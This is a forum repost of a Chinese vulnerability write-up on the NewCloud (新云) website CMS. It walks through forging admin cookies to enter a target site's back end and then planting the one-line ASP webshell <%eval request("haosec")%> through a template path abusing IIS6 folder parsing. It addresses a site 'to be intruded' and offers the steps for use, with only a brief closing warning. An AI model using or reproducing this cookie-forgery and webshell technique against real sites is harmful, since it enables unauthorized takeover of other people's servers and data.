服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5464|回复: 3

新云网站管理系统后台WEBSHELL漏洞

[复制链接]
dirtysea 发表于 2008-11-5 05:28:44 | 显示全部楼层 |阅读模式
新云网站管理系统后台WEBSHELL漏洞
文章作者:HaoSec.TS
漏洞发布:好安全网
宣 言:打造中国互联网安全长城
漏洞形成:过滤不严密
危 害:获得MD5,攻陷整个网站。
影响范围:全ACCESS版本,SQL未测试。

新云网站管理系统是现在比较流行的CMS系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。
一、COOKIES欺骗,进入后台。
大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来,但其实,新云的后台只要知道MD5的值就可以进入,这也是一般的ASP程序经常有的情况。
方法就是在本地搭设一个相同版本的新云站点,然后用COOKIES修改浏览器,先进入本地的新云管理后台,然后修改COOKIES ,将账号、密码、网址都改成待入侵网站的就可以了,一回车,你就会发现我们已经成功的进入了待入侵网站的后台。
这个方法比较简单,也常见,我就不多说了,我的是下面的后台如何取得WEBSHELL.
二、后台拿WEBSHELL(系统2003)
我们点击模板管理,新建一个模板,名称随便,但注意模板路径一定要是"1.asp"这类,因为2003会把1.asp解析成为文件夹,新建完成之后我们会看到网站根目录下面会生成一个1.asp的文件夹,这时我们点击编辑CSS样式,我们将整个代码都用<%eval request("haosec")%>替换掉,然后点击保存。
这时你会发现,在1.asp文件夹下面会新建一个文件style.css,里面的内容就是一句话了。我们将http://my/1.asp/style.css用LACKER2一句话进行连接,可以看到已经连接成功。
这样我们就得到了一个WEBSHELL.
其实漏洞形成的原因无非就是过滤不严密造成的,使用新云的朋友一定要保护好数据库和后台,否则你就惨喽。
 楼主| dirtysea 发表于 2006-6-15 23:08:33 | 显示全部楼层

re:新云网站管理系统后台WEBSHELL漏洞

早说出来我就不会有失恋的痛苦了!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-19 14:06 , Processed in 0.187027 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表